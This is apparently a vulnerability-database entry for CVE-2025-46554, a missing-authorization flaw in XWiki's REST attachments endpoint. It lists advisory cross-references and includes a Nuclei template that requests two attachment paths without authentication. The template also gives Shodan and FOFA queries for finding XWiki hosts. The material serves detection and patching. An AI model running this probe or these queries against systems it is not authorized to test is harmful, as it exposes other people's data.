XWiki REST API - Attachments Disclosure

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType

Unauthenticated users can access attachments and metadata via XWiki, risking disclosure.

Reporter	Title	Published	Views	Family All 15
BDU FSTEC	The vulnerability of the org.xwiki.platform:xwiki-platform-repository-rest-server component of the XWiki Platform, a platform for creating collaborative web applications. This vulnerability allows attackers to gain unauthorized access to protected information.	9 May 202500:00	–	bdu_fstec
Circl	CVE-2025-46554	30 Apr 202519:13	–	circl
CNNVD	XWiki Platform 安全漏洞	30 Apr 202500:00	–	cnnvd
CVE	CVE-2025-46554	30 Apr 202518:27	–	cve
Cvelist	CVE-2025-46554 XWiki missing authorization when accessing the wiki level attachments list and metadata via REST API	30 Apr 202518:27	–	cvelist
EUVD	EUVD-2025-12749	3 Oct 202520:07	–	euvd
Github Security Blog	XWiki missing authorization when accessing the wiki level attachments list and metadata via REST API	30 Apr 202516:49	–	github
NVD	CVE-2025-46554	30 Apr 202519:15	–	nvd
OpenVAS	XWiki 1.8.1 < 14.10.22, 15.0-rc-1 < 15.10.12, 16.0.0-rc-1 < 16.4.3, 16.5.0-rc-1 < 16.7.0 Improper Authorization Vulnerability (GHSA-r5cr-xm48-97xp)	18 Jul 202500:00	–	openvas
OSV	CVE-2025-46554 XWiki missing authorization when accessing the wiki level attachments list and metadata via REST API	30 Apr 202518:27	–	osv

Source	Link
jira	www.jira.xwiki.org/browse/XWIKI-22424
nvd	www.nvd.nist.gov/vuln/detail/CVE-2025-46554

id: CVE-2025-46554

info:
  name: XWiki REST API - Attachments Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's REST API allows unauthenticated users to access attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachments metadata.
  impact: |
    Unauthenticated users can access attachment lists and metadata through the REST API attachments endpoint, potentially exposing sensitive information.
  remediation: |
    Upgrade to the latest XWiki version that implements proper authorization checks for the attachments REST API endpoint.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-22424
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46554
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-285
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"

    payloads:
      path:
        - "rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"
        - "xwiki/rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(header, 'text/xml', 'text/javascript')"
          - "contains_all(body, '<attachments', '<item', '<longSize')"
        condition: and
# digest: 4a0a0047304502206177deff6ff948bb176ed1b03d3ce3babb2b0a4b649fc427cb661942fec55910022100e0c0a62453b2f0915dab21441469a47740394704e6431a3f458b490e5cf7faa9:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.1Medium risk

Vulners AI Score6.1

CVSS 3.15.3

EPSS0.00948

SSVC